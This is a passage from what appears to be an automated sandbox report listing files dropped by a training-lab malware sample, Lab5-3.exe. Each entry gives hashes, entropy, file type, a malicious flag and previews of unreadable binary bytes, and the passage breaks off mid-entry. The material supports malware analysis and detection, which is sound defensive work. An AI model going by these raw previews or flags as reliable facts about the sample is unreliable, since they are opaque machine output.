                                                                                                          Preview:....<..T...F...i.....>9......j...a...g.-.F.HQ.R....Z...2?.t..E.w ]......e..a.......M3l.....:....q..?.).c8Na..~/..l......n.a..=.>.2.d...........\.......2........0..Lk).xBPw..B.Q.../....9k$n...@.....g.yq.....A...A.[l =..J......lq.c.V.m.\..2....B....3*.!.....Ime^..Rm.rze..;k....-.-.".S...a.P..$.....m$r.!:.Z....B..FP.E...~.%.....c(....}.mL.z.I......;.;(#4.".<I......3%...5.MFx!+&~....^......f.]........>-........X...m.y4+....7.8....Rx.].&y..iP.}..q.6.k...`..bf<..E.:../A;..x......:5.pq*{..J......e..<..}.!..-.c...}D.o1Om..w..$.K.R.c.,...[7.....7..W.Q.g...%~r <-=..vt....h...zT...!{....jX....J...K...{.kl..U.v.....@....`.H.\|.>.....*..-<.....=FB.I...A8..i.;...*N.j.n.2.US.*x......,~..D~........B...ym...C.t.....6..@...ym.G.22K.....6..O0...-..R!4...R...wI.|2.H..f@0.-..F.....<...lv\?.B.F.....z.d<|.!.ET\...#.......N..).........$.A~..qB..1.=Z....W.^b.D.b6}.JR.;(....w.4.}....^........./:+0.pv..h..^..r..C.7.9../.C.:..Y.4.g.o*>..."..z..~L..W(t..a
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):32160
                                                                                                          Entropy (8bit):7.993985530632917
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:5TxzLhLNjuPLKRa3sXkzh76F6/CDglbbpXdxunmtc7WeYeO4ie2WAvOGxHHjZ:5LLRuLszgtFd8djYeOnvBvOkHjZ
                                                                                                          MD5:256642F31078015705F2BB97C012D50B
                                                                                                          SHA1:49556E11B12BCCF1941E772DBADC7DF50A0E0B56
                                                                                                          SHA-256:1DEC4504D43A3C900E4C487A231F13A0327C54D69159DFF7D87B39B4B7A20B22
                                                                                                          SHA-512:141B366B01138AE878F377F4724631C1ED5BE2D56D594C5093C96CF0D46D648AE3739C10726A6990CEBD6007E79EC074F642559020DDE87DC0BCB5864CB85E13
                                                                                                          Malicious:true
                                                                                                          Preview:<F_>..vDK.[F.{ '.$fkz..){~......r...Hj!..t.PN^.X..0...#..f.#F... .X.&.eK...C.y.Q1#. .O.K".70......JP.u._.....?....d&..../(`.q~....l."|J.]|.fk..H...q.Gn....t.......b.eT.....N...v..Q<*....w.w+n.Y..N.T..X...|.&W..^r...x?p./.d..y+......]..p.$..%OP..../.N.uc..e`.&..hW..#..z.L:..C.x%U...Q>.....P...0...`...W..bM.s..oQ.d..<M5..]QM.-....|.ZR)....],........M.j9.......GZ..x6.9.......f.ed*d.]z+..n..a.8.+.........Wq..E{.T...K.:....&....!.:.$m..J...-.N....s*...7...Q.x......EB.*..r....TpW...'.;v....).~.k..hh...=S.r...d.g[...~o....Ud'..D7.9..w...5{.~7..Z8..^g...fw...zm..\....q/.+..6;.......Z...P..D.G.......u..*!..>Y..W@....L{]....6../........ ..K.rC.i......?..5c....gLBT...xb..P.D...%.97......K.:..........].......Kx.)..l.-...3./..>..@.....T.f.......`Ht.x..a/..h.H.[.....p.%0.(yB..9..l...O.`..8...ToO..ps....I.....7Gl.......6..T...z7.[W.[V=..r..f.Sw)...O.cY.$..=...}.hO..T..~..3...qtIw....8L....ikI;S..zg..us&...D..JI....'IY...nG3..:..et4%.....p.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):825222
                                                                                                          Entropy (8bit):6.76863557074562
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:c7HtTnen6WNnjdEjeAaZkO4HBQH/6uX/SiJwsrIUboNR2SelrZunEgneoVuZ:c7NTnW+ub8uX/SnUboNRAZuRlVi
                                                                                                          MD5:871B3CEFDC89D573722F580643540180
                                                                                                          SHA1:32216C4E4945216DD4BED5300FD7202F4C8CD30B
                                                                                                          SHA-256:F336C9BB9D08E677DBB03C6A4A2FE4CDC05A4C2BE7AA3F6B3C2AE67D6F03C075
                                                                                                          SHA-512:8A239C45E9AA4A4D7EC92A738329CBB9B3A9D2F79476648A103E0341F9C402E90923E76FA7E738E645E6E3281E15B97A5C5AF1094BA691BED4824C0E0124A78F
                                                                                                          Malicious:false
                                                                                                          Preview:.........y.i4.T..f-.A..w. ......mm.. tL=_..C..d...\.2..D"..Ku...cG.D....(.n..:.of[..+|..pgz......=VZ ..!R.J.mb.Y.Y[O.\.ri..QsO5Az.a..;(..jlFrCm..R...4/..E..d?"R.......\.V.HFP.&.!7....l.....=.3....H...&%L.....P..[z.... ..E.A.'N..+_.Q..........#O.'........}.T6.v.5G..Hy..z.p..t..A ."\.....l*.....u.\+z...8.`.7..KU......M..&....~..A..k.ONb..K}.kx.A.`.Y-...brJl8=.......*.Q.j..d6...}9o.....p"L............l.......}.}G....Z.MhXm.......)W@..n..m.@O.......|......U#..6...9....F.F.R..^..CH.2 .Hr%&.b+`!v.B....|....D9...7Xr...o.&...{..p...U.@...=3Y....%<H......8.=i.:....R!....Xy..s%A.d.i.oN.Y]..H.l....-;.9....L...9..D..M.q.Kf.Ga..S.......k{y..;...N.[.5.].cH......M...JOMO7.....}I...{e.....0..!...S.o.l...}...{....8."Nay.G.W$k..\z.......Z>j...S.;;r/.AG....^...Q3..&........+.gE..W`W......>0G..P.p.z.....?.i.XK\..s'.#......$..o,.`.v8..y.{.ql..L......%.9...UHf.fq.i..(..XpC.l_.-F...+.G...w.hp_...ZHLb"...V......!n!.C[$.8.;....l.........?.~..Er.....0[...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14480
                                                                                                          Entropy (8bit):7.986197364743079
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:qnms03JR03+3RGuUFwwQL0meWa+jYwwGIdiHe4bAtb:g+eO3RGuJnvaCJwGaiHepZ
                                                                                                          MD5:782C0F75D6991FB21E6614A0033B1AA7
                                                                                                          SHA1:7B25FF613DC209B3C546A313B8E034937AEDA976
                                                                                                          SHA-256:30DC9995F31F18D6E0E2F7E852CF43CB256E88B727F10A9672D5765CA764C7A1
                                                                                                          SHA-512:BCD58F8AE80FFEC3A0026D3F82EB1C427F719881775E2F9FF06FF510DE7D224AF940A854E98E96AC3413431A502E28899F8026F14AFE2AEA34FA5E4FECF72A61
                                                                                                          Malicious:false
                                                                                                          Preview:YX:6<;.......!v....4....Mq.....:..A.....*=..d8.. e-.F%...wAi...d....T6BA...I?...?...KT..t.^.......q!...O..n..........:.Uc9{.OS...4...dkQ.....m...... .....0.......[..n;.R..5..n..#.2..5G...W.u...S..3SJq...l.."...h.#..H..\=P.V.....A.X....P.x.......F./c.7$"v.....ST+:..;..ax.i.#a..3...I8.&...w.a...3.*......d..Ep...Z.A./........v~....a...]v..WX.w..Q.<.....`..xv'JIty.0.$r#AO..@..Q...4..Q(......A.....S#.ar.0 ..7lm..K./D.l0a..$7.u..F.t.x.^3Z|..*.........u$.[._},..Li.G...c.2An....Nj...p"......\nG{...8.koE....CP...&....@*'.<|.} .. ...1.#....O]|.cu.h..Go.hh.i.V..m..JaG*........."..........t.....G...w._.T.RR..v..L...PR.f.....l7*..O.N. ...^...)4.8.;....].N..Mt..w.S........I.@...C..n_G.o.j[ ut.{yI.....h..3..+.t'. C].........|~.`..x.....f}....w.;w.3..8....#]R.;_S,....sY..u.?`'..Z.,h:G**;`.E=...&%.2V.g..>..S.."F=.=..go......}..Px.5...u....UW./0r.B./24.x....=[.@..&.2...C.2.....GO.....J.O.(.w(.{........Ll..Y.~.G...b>o.j.#.....h...~.&.C..g. ;......'B.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4016
                                                                                                          Entropy (8bit):7.956178211231312
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:x4AxiGNabYhN7IZ3/fH5Nbn4AtjYGx0uKeY2ElUJ:JiGNeYHA3H5Nz4G0Cb
                                                                                                          MD5:A3617F76D76CF02A5BAC46D5935469E8
                                                                                                          SHA1:259493708FBB780B0BD5CCDE7C26BBA0F9442263
                                                                                                          SHA-256:EA2B9E1AC45C69139983B668A7B124AFE5F719AB1BC066ABF97E732D7589B3DE
                                                                                                          SHA-512:CFAE6055447EDA4F799DF22177A5CAD2AAF3346FA95215E99513E2E1E4B07C536BA8A2C4F188A68E016A8D9909809FAF55C81CED82D517A9C92E208267846E0A
                                                                                                          Malicious:false
                                                                                                          Preview:.6......U)....]..bI@.ZZ..wu........R.~.5f...;c..t.0].MQ.!X.=>u....N......Cg..R...[.6=s..`}&OA..5..3.hL....{.7.\EO.t..Q1l.r..%...6.A%......b.E'...J.E..D._p[3y3..(.[......n..".....|..P.M.\...fT...;0....?."5.2..+.......n....W.......f............. s.8f2|@j...I`w..0......\.<.7.....u..;.L.+....Am".......5.h5...:.8p%..Y..<?.6bK..z..12*.>5.<...;.I..X.Z..vF.V....r...W.7^.R.Q..R....v...E.>Q........V+...........LM".U.......2...x;rr.a..0.Y*g..6U..N^.G.H.%.Q.M.....z.2...q.T...q9.W)x8W.....?...1...q....cs....6......kw. .....+..a.d.X..q.*....wq....e.a.v.I...&n.j..4G..:.iq....q....0...<(....0....`..$..h.Z...%..y..../(Y..w+L.'.....e.G.>P>U..W..m..)...H..t.3....Q.W?l......:.j.[.1A...M.CT.....XW<...X...W&ko....>.?@._.kC..`........g'l-......K......G..tr....n"`..qQ.....4_....Y..J.8......jDBpT.A.......0.Q^..Z.'.3;:.A<.....l.Z4g.....j..:....v18b..:|.{.R.=5..3Y.V...Sr*..,].W...1..o...0=+.......,..g.....:jG..8.7.^..y..gxy..R.g..+/.+.\[b..\P..$
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3744
                                                                                                          Entropy (8bit):7.9494711346249325
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:TqO247TUkebvWyE7FCFgbQKeD2fXKd5/Gx0uKeY2ElUJ:TqO2nkebvWT7FCFCesb0Cb
                                                                                                          MD5:C0D148562EE083E2B8ACF52B17947B3E
                                                                                                          SHA1:BEDF178C5D3DFAC0FFECA6003279BFE293015ACE
                                                                                                          SHA-256:DACC68A297FECB5FAE9D66AAB1E44EAEB074385430C71596CF3118791230F8AD
                                                                                                          SHA-512:3E40AA5F7DC97BEEE7406A51060A9CFD36C0455931430C6000E2A00547F78FEEF04FB7BFBC920A8970868F8756B3158FB312FF46B52087A51D8C79665AC364ED
                                                                                                          Malicious:false
                                                                                                          Preview:f............b......1p32..a.pN..nq~...,...w.C........q..[b._.-.'..Y3....$.J...P.....N..{.f..`.].%...E!....\..@J".5G.'3....e4u.3A.or...m..S........w....N...4.AW.C...U.*h.V_...Hg=.(. ./1..:W..q...^D.P@..S....=d..D.....5......L..e.e%F..I.......f .....F...:.....-.`....a......h.<..2..r4.......I..8..H.z..@..\+..`T..q...y..R.z....+X.N..1.N.;....g..y{.U..DQU..+.h.6.3xt.?8}..fT............fJ...........pH{r..vxc..M...v.(.V.hb.t.Y.a.....q..zc.,..@_p1..r.AbNy..S.sN..n..<.....Z..5..`f..l8o.;C....._3.S.B.K.}A.Ppf..%.vw............^+............X0.....;.N.ZS.D.l.!Sh.~........?....D.......8..[..a.M....d....-......iL.T.......d...0..P....&VE.I/.>..<.L.....!.|..7|F.M..v.FI.......]Tb.x..!......Fd..F$+..4,..U............X.....q...?...........:.:-%.cV8..<f..t.7...n<...v.1..<.b.....PU{p...............].....}S.a.ve_.^e.y$a.|!.Z.p...^....,.M.c.Q..:..K?~......OIH21..K..pz...'`...&Q..y..|HV*9...D%.../F.....6}..Fv......*&...o..B;.[6..A.2]....B....C..7w...0.~..5f
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3792
                                                                                                          Entropy (8bit):7.950727718604803
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:YMa5iSeNWVjVaw8jciUU1DKp3dEvrBg80eU52A+3U/5jGx0uKeY2ElUJ:ba8gVpzW2cDmd+rhU52A95A0Cb
                                                                                                          MD5:AA7C7CCE25E54BBD47AF60143AB8C769
                                                                                                          SHA1:3CCC65F4F1A3226BAF7D0D8BC711AFC5B4C6A758
                                                                                                          SHA-256:5CF632112A4459FC19C4AE01C7C3116812F6D5386B7F9D44F2C1C76035486196
                                                                                                          SHA-512:6574B26A021DC6D0131EFC97927311498176064C27DD91084B371C2D3DB041AA0ED89B067867D807667FE46CB5C1814D6AD203749F27BF2FE6513DD450923125
                                                                                                          Malicious:false
                                                                                                          Preview:........G.)..p.o..r.Z.V......D...K.Z.$.|..|d.s_.o..:.vx...y...=..!....hF(.....p.....1..?.....$.V..8.].&...z..`....e.T.'..~..8w..m..FVq....h...9.&C......T8................ I6.i.BR.mi.V.:.6h.....+h......4..H\.z.%.li8.NF.:....jJ'...'~t>.l..,.n....Q.R.p].....V.~2 ...`.q9...Y*.lwx........P..}a..6. .=?..[K.|.Hi........~&OR.Y^RH.........U..L2pg^./._.Q...63.......;t..F......).]..<2..;.K....U.)H.....5:...9...:.~.4...I..VK..E.pu.L....q{.c...^.F...z..-.U\.Xp.q....z...]....?.S......t/.v."y-a.R|;t..D..5..(...BF..!...qo.a.)..a.d[.1j...i$.......v.. ^;E5.I.W~...s.X...3.Z........k..ks.P...:/....W.k..9a.".N$...m....#.9.M}..4:.]f?$i....U!....o2+.'.g......%]p.e....v.:.d..........bG.u$3...E.....h.W..'e.....`GXM"JL....g[4S.j.kK...r.x....{......)s\.=....\jZ}..N.-F...../.<..O.]u2L.n<.Y.w?M...(.......{...o.....2St.cX...>7../...9X.{...?.OF......J..^..A.=..sxRF.....7..up.E.....e$}f.^.Q.x.e.8.R..9.}b.C.U.~.g...`...E.....c^E....^..T=...-...o.0.-r.!..q...c5...m.&L
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3888
                                                                                                          Entropy (8bit):7.947537458851798
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:OXW0h9eHGS5/OLRqjKWtmJ7r7P7yeUcGx0uKeY2ElUJ:NHGUSqjjkZ7P7Wv0Cb
                                                                                                          MD5:7E9A0B8BDEF0B08EF34C014804CC7AAE
                                                                                                          SHA1:029C5F6B39EEF482CECA62AA57D40F4159A8D5CD
                                                                                                          SHA-256:18B709FE17B8969A4160C9CE63990D14E1AE3B45AF3E07E54FCC512A1DABDAD1
                                                                                                          SHA-512:EE36A2852BBDBCA81308DB4D26C8474B292398A5E23A8ED742B8F93B814262BCF63597FBDF4884E5A9B9E418AC61BDE3015AAE8A22555264683D945DAE3D71FE
                                                                                                          Malicious:false
                                                                                                          Preview:.._..>9.K=.xp .b2..4...X:.`...D.v.Y......Z>^..M2...N./.?..,..I.3.......i...-.6.\..E.D"..Q.'...}.x.|RB...e.... !...y../!...--8...cm.x....$.q....1.h.n........)...;.Fq......!.W.8'....Q.....y#..=.....8...B.@=.RwBK[O....-[A_.....[*:...;T'.~..Q<u..........c..=..9(.4...:<~......-...d........D..V.H.j..A..d..TO.Ya....)H..'....w.Fmj.../..u.9].fs..l...[.s..&.!....G..t).F*.C..... JF.....J....+....R@..D..X.....%...k.b...<y...Q..O>.IJ...F.A.$...WY{^.A..p.a1ed.#:..Z`6FcC'.-n.~.%@..h.a..Mp.q*.:.M.......U.40]61...H..|q..)...B.B..j.u.O...Q@NGy...]Z..=.2.};.C...k....d....P..7....Nj....zq..a.....(./H.I(9.zl...f.os3i..+.G@.|.!....i`.......Q,[....5..V.T....6r.`V........b..o.l.5=.g.....5..\^8...$...U..O..KRr....R.;=...^-...5..u4W.Qo"].....1/X..p..c.hC_...ao.. v....3.c..%....+...h..+...*....R...n..?...m.~..O.H#.e..-..&z..,.9)z...;..j.B&.f.....R.ns~...P.i..@aO.M.*.$...!Q...4..=QLq.X.2...Y@.s..B.C.~?..f.H8...............}...........43...67.m....).....[~>!..y.....=i.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3824
                                                                                                          Entropy (8bit):7.95718455583324
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:22d7YgGa6DYIOq3zDWyxSO4DuLYg79sGx0uKeY2ElUJ:2wYg36DtOIH4cX0Cb
                                                                                                          MD5:ABD4E36E94AFBD022116F9E1877F19D4
                                                                                                          SHA1:56A1BF59DFD1E81C9FABC65A54E98D81BDEE4481
                                                                                                          SHA-256:7EAE6DD3DA561F492D88E3F824939567F8C084110E02B3EFF5D684DFA7B80506
                                                                                                          SHA-512:8AB4D7BAD27E991956850C9146519D66C5700B73D4115E70AE424ECC88D3DB6944C3411D57C5D9D09B6AE8BE5501B34AA669ADE2EE4C177944DFED379053DF3C
                                                                                                          Malicious:false
                                                                                                          Preview:F|".g`..Y.%........^..wm...R.......a..Vb.$p'\.@b.2.\.U......]U.....*.J*.8.\${.......[b1.3......k..}..&>..s.[...h-e....p+3.`-.m&.Y....No..aT YBq.e.F......K.b....\6.ZN..!9.......:....u.Ojr.w.......n.5p.H.=.....^M^fB.V..D%.G.}..{.B...5d9..H..8....K9...{......)L.o...V....X....Lp.4.#.!.2O.k.[...r.~...R.....%.%.I.gR.1e}p....e..B......A.....&H.....m9.vg..#S...u......./.'.....Y.AP..d.].%...!.BS......J...%.........O..iB{C.S%........"<C..3iF....#Ru...o.N....@x..[.=.>X@..p... !.6.e.4..FH.njBZ(l'....[.Fy...j.JQpV^.E...o...L.k.I.=.\.b.v..3...NL..43...hJM../.0..Mt....N.t..r....%..r.`...)+..hw....X.2..#"...`.U0Q...d....(...#.7.....).a9.*....m<u......,...."..h3C:..../.i:.V.......i/..".......5...>krh`.n........E..o..>Y...(}.L7.._.9..Gn..<U.C.@.X..s..........V......2.P..g.75.z.../{..k...7D..Qy..(.5...FB.<%..Uq...92..Y...&.....L.t..E.. ..%.5......~...#......6Jm.......1.c...._K-u.|~=.|.).....z..n.....,....J..);..o.Zj..O.6^n.>.bc&k.......wfq....[.....k.m.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3936
                                                                                                          Entropy (8bit):7.956711873655943
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:pamdZQ/z+3NhKbDKVBKndny6QES0C53abkfDTGx0uKeY2ElUJ:LHQ4ODKPKnQ6ibzfE0Cb
                                                                                                          MD5:C8EB703BAB6A7B6B1E4843311A213EAE
                                                                                                          SHA1:D1384C949D5FD15444FCB7F71167D5720398C8DB
                                                                                                          SHA-256:5D006D14E07E528DE68A0B833EE604D42592E63ADDF8CD5790D5CEA1A53FF621
                                                                                                          SHA-512:09B278340F8364A43FFC9E8006E602E080ED65E3332F873B461D4B67598CC99068F7C6C8AB66AD531E8F0AA0C47B5AAEB6F09CBB602B5F518CA9E81555F5100A
                                                                                                          Malicious:false
                                                                                                          Preview:.3.C.[........EW)...5A...<1#.Z..m.8.y.H...m..Gt....]....Z3........)..C.Z.6..[.Fb....qcn.!..S../....RkL..6.g=4............m.{.)..h.r..Uq.A5...h+T.....#b..@/.T....w.....Ya...4$.1.@......D#...+xM.&s.;.......F..Ml....E..D..Hl...... ..!.9.!.,...(.rT.-...7.3.:P|oGD.'Vn'"K\pL.f.lA.;]..^Q..D 6.M ..pm.f.4..x...@.'..c....y..#.U...V..E......C s.[.N#.....]\4B....M...isDk..P...Y%.......GQ.xb.E-.,..C..{...s..%0...:..........e.QO.e~.Yn@.!..........i.....).&gOP).>.<.....o[...J..O....Sg.....'.....E.m7q`.s{.P!+.Y.6..D^..?}..V...$..B.....K.N...#.......E.1o.}~..N...u.6..@p..-e.4.{;..uS.u$>...D..V._.o.....;B.|:)...u.......3=..O.A.Q!...##...VW]......].k.R..".......^.Jg8T.....6.MSg.B'.(ur.=.7..l......i....K.rU..0..R...t...og..r....o....G........"....9R....o.<.A.wn..fc....C...........>3LH.....Nw..Purb+..3.."..[.G].I-f....c..I....6*...#u.1...|..k......!.. 9..D?z..[......j.J...|....5+Wk.K:5Hb..W.}....G.:MQ`...Y2.B.k......K1p&M....,..z&.......hD...".Ie.x>. ...<....M.^..'
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3744
                                                                                                          Entropy (8bit):7.954284953482473
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:aPTX/W7wlx+9U2qlqgVXjGgGx0uKeY2ElUJ:8X/wuZkiXjGT0Cb
                                                                                                          MD5:FEF0D63A42E02830BFA095445788535A
                                                                                                          SHA1:DB27C33E89C42FEA184EC0017BB86B07E0C198CA
                                                                                                          SHA-256:5F640C6D6A3E2190C3860ED355B9B99D1E411C3F99DC44A6301CB1B18B569BF5
                                                                                                          SHA-512:30158EAC4D65830F0B04A62CF7353324FDCF5E57A279EC1966A0F850925D32A739570742B8B971702B28BDE1AF98AACB766BA21DAEE118A6BC4F3DE5E73C8FED
                                                                                                          Malicious:false
                                                                                                          Preview:..I........(.....H#-C#...go<8F.A.U..C......m..\a...+..x.W.U_...J.'..D....,xET..b'........)Ja.&.J." M.....1...V...a]...x.6...I. ..:..#........".2.Q...@.y.c..ep.T..Y...........O.^.4ag.Zh..I..N...7.....j"...\u..~.q .SW._..D.Z.d...../N....}y.~..|..%..0.x..n...n..^.\..j\%.d...A.1..+@....P...$...>.^MR)....g-..r.K<.....F.@D.....='..Ed.3s.]...L.......vP.....A...O~.....O....5b$.v{..,.D..Nlb.+.)........@...y.......3J.....C&!g.~.......N.U."%a..A...d....i......{..E..].{$..B.Lh.z.....:.....E.?.#DO.V..KW.0(..)...:..@..lj.E=".H....@.@8.>.Z[\..S.?.....yB..B...RQ......6..&+.T.6..l.*.W..Wj...........*.5|..v.....Sk.l.g.)..].B.1..|UV.:L...d.....|, k+...)fhn..{.DZ....N.c.:....'....z..C.E..v...>...H....`.I....YF|.D..3............0....a...g'c.&=.....?.c...4..#eB.....T.j.L..^;.GN...4P..R../........C.z.........:..O...u...e>ovJ..Ck...n.Y......![..:#lf.I..../.....Y..yA.......?.Bc..j.2s..<E.Il....!.Ckw./z.....}d.Z....z.]..j..R.X..220....s..Sr.........Y.J9......]g
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4352
                                                                                                          Entropy (8bit):7.957142289277052
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:7OEa8PauMJj5ktYtjAjD4/SLpASWOFjOCGx0uKeY2ElUJ:638ZMJ9ktd3zOS7g0Cb
                                                                                                          MD5:921AA661C23FD287161CC137592FE2CE
                                                                                                          SHA1:A4FFFE30515DCEFFF7DFB5DD85C5E84B465321C3
                                                                                                          SHA-256:5116E1997DF8D1D275BB4B6AEA49323F118CD1AB0D48D37EE8AB1945B2CA0B43
                                                                                                          SHA-512:C9D7075B32BB3D20D97A5011544C40DAB0AF246011AB30D8A48112C2B8522F01114DDC0DCFB741D8B0CF37A0F307C266064B37CB36E93259628A3CD21D9C963B
                                                                                                          Malicious:false
                                                                                                          Preview:......<O@.I30.a.(...g..;.T1l..H..o.. F...r..I...\..XZ..?K....&.3."!....q..:.@..t.....yY..1.R........2.W..%....e`b...z....%.&....k.k*Y.....v...3..!.h.~..k.u#.\I6..Vs..Kr.4.T.,m...&.F.KC.<...N...].$7......z._....`..>....?.&......4."..7.....-..6x0$.....hT.N.........()0r..H.,..x..%...F...iwz9!.....6 Xa....k.....b.....SK.m...R.<A....Q...O).%.(}Xus.+..:..."..b.....'.#..NY..s~...l.bl....x.].m...:..l..C...X...[.xEG...........U.k...g...i.......Y.j.W..3.r.!."n...R..{.<...K.]......K....m....r......I..........v*........\i.$...!.K.........P@.I..?]-..M...Z(..>.z.D..[.JK..`A,@...YV....w..hM|....,....`q..."....P.......M.u......a.11........y.mz]....8..*^QY..=..8......R(|....ukx....;.aP-.j.z......&+$...T.q..GC....j....Hz.6.....[W.5..)...)C:.L..=...;....x.'.QR..F....,...A.....L.....a|o".".R.Lz..)...........z...E..g..m:..$....`.G.\e.].........Iwoc..W.}....C....#......}..!..c.../.I......#c.Q.l..m...@, .%.b......Cg0.b......7O...K.&.y.....Y.)._...'.{.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3968
                                                                                                          Entropy (8bit):7.9521149142875664
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:QwkXAHtoiEx7AuIZLwxwmZosu1cG/Gx0uKeY2ElUJ:pLNE7VvmwPu1T80Cb
                                                                                                          MD5:7F0F78410D619C0C26275406AF47A236
                                                                                                          SHA1:A2C4CE89A00D902CC8AB41EEC006C0A7C4475AFC
                                                                                                          SHA-256:3F034C4E34A68D81E5FBF72E758850BC591A5F7327B4D54E94F33AA1A584A62E
                                                                                                          SHA-512:6D826A57A0D8A9862FF364DFEB1AB7FF2A7F3795621523046ABAC0A3363E50A546CEC6F2B816000B477C04BD26A6BC864D8E878F3ED817E22860173B8C6D0D0F
                                                                                                          Malicious:false
                                                                                                          Preview:j.|%.g..#F..i.y..U].K.h|K..]WO+.R...mo9...;..V.q..vV.B|....#X......]....c...6..v......F...M..d..XB..<-.NJ...qOEi....B.rF......|.|....,...JI..k....r..XOv..R.o..C...r...\..}Mr.Y. }..9'`Bi.....a[....6.y+.!...>*G.)<..........d...wPk3..G.....D...$.[.KvG..1.c...:..Mdo..n..A..z....a^JG..Xes(....S....F....+...t....'}...\.j......Xa...j'...I..^?.G.1g..F..qV..IrO.=AIS..\..>......).......X..8D.y.......A].....Q..`..)..\......v...1D..?.....a..I.@Q1....rq..:.X.....O6.y..._./..Q.&.;A..!:/US7....Pi..Te..m.4X....LJ.b+....`....]r..B....[.s.f..;D.....B..Jt.k....6.4.R...*..+4gp.c..+..,.....(C>.7...;.......Q......8$......v>.(.c..?S.......:l`&!.!.J./.p....DP.~.a-.eJn.Xk..&..W...H..i...#i.%....eJ3.>.&..2f....d..1.n2.!......l.@^.C......5w..N.[...5..9Liti.M..g..$...H..{...,......)c...id.........i*..{K.Z..*H'..>....w.....X|.Y%....n ".^.U....).F.z.%..m...4g.a:w ."a....k.D......hT....M.=..C.t.W1.!..T?.+`=y....g.V.+@u.r.c......XD.e..G4py.U.@/k;..."..$.-slVU.{.L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3808
                                                                                                          Entropy (8bit):7.952478529046688
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:p0qb1H4wvy6I8ar4DIPfJGx0uKeY2ElUJ:eU4/6wr4ufy0Cb
                                                                                                          MD5:FC8347832A72A5ED85094CE897DDB4E5
                                                                                                          SHA1:A99715716219A6987F8354FF00B4FFA127780D5A
                                                                                                          SHA-256:1FD50ED4D3AAB014CDEDAB87722B86A7172E7DC434699F6BF4612EF4F0A4BA49
                                                                                                          SHA-512:87E0BC7A26DECD43496598F597E42F0C835A76D1EACDD70127ABB6645457A92AF395619B6FE5311EF475D0B0FB70F1B8B64EF2811A4F8C714D097D62D8C10D87
                                                                                                          Malicious:false
                                                                                                          Preview:q._.l....d...fu...n.(i9........^Z.Qb....>.{@p.6$j.F..eC..<}-...R....>[{. .Ws.%.p...4y.9](..e....;;......1........N.GA..#.*...b.y..n8_..5S..U..U.:.O...E...$m.... ..p....m....../..`.W.....>.U.dAN}..)D<xM.%y2...).$...S.z.:.x.+..ehv.mI.z...?...!.......-.b.].!.>.['.l.2..3.)c.3..ok....w...cm_k.po&..F..R...@.B..z]........L..VD.6.zQ.NS....0._...%.......V...N>.T..<....z..a.Q..ov|&.......%......<.........#..O..*g3+..Pj}....3c...q...to9.7..:.2f..{^:...vZ....{.......)AZu:w...`jR..Y3.#..^.b..?.3.d.mI2........s.4.<....Z..\.;r...H...c.zC.t.j+NSS.<..\.f..ve.l..;M`.Y.l.Ks.....I.j.............c^/=.[..'.-..r..HJ..R.l......|e.S...T..T.C...u.SrC.g.'...Ly'......%...v/J.....J.n0Mj..\..E............%.,$.T.DV...p..kD>\....-.w.-...T.:Q.....82..g.}.b'>DC.Wy..yJ..'.bP..J....3zw...m..y.....QB..0....0\.Hd...Q.."Z.C.'_,...zl...G.l....a&..;.D.S.x.G....n ..x<B.S.9!b&...w.t....`m\.5a=.xR.@..(...h.......}t.....`o9.}.1.#.g....1C.4C...RRa..t..m.z.k.O.....[..$H,v
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2880
                                                                                                          Entropy (8bit):7.938175709908904
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:q59XLMHRFZhYvMymOsCfx6E3NRzqFfZ5yZm/+Z4XVHfUTid3hBaUoSGFcmeykEdM:CVMHRFZuhmOse1R65y0/+ZUuGx0uKeYO
                                                                                                          MD5:A9A7B1F21B099C12E625E953B87FB7EA
                                                                                                          SHA1:CEFFB8402D66876871610D93797C86DBA8CA1590
                                                                                                          SHA-256:EF8ABB15535EF88F4425646F276A9CCB354265BE511A919D1A07DA7206056CE6
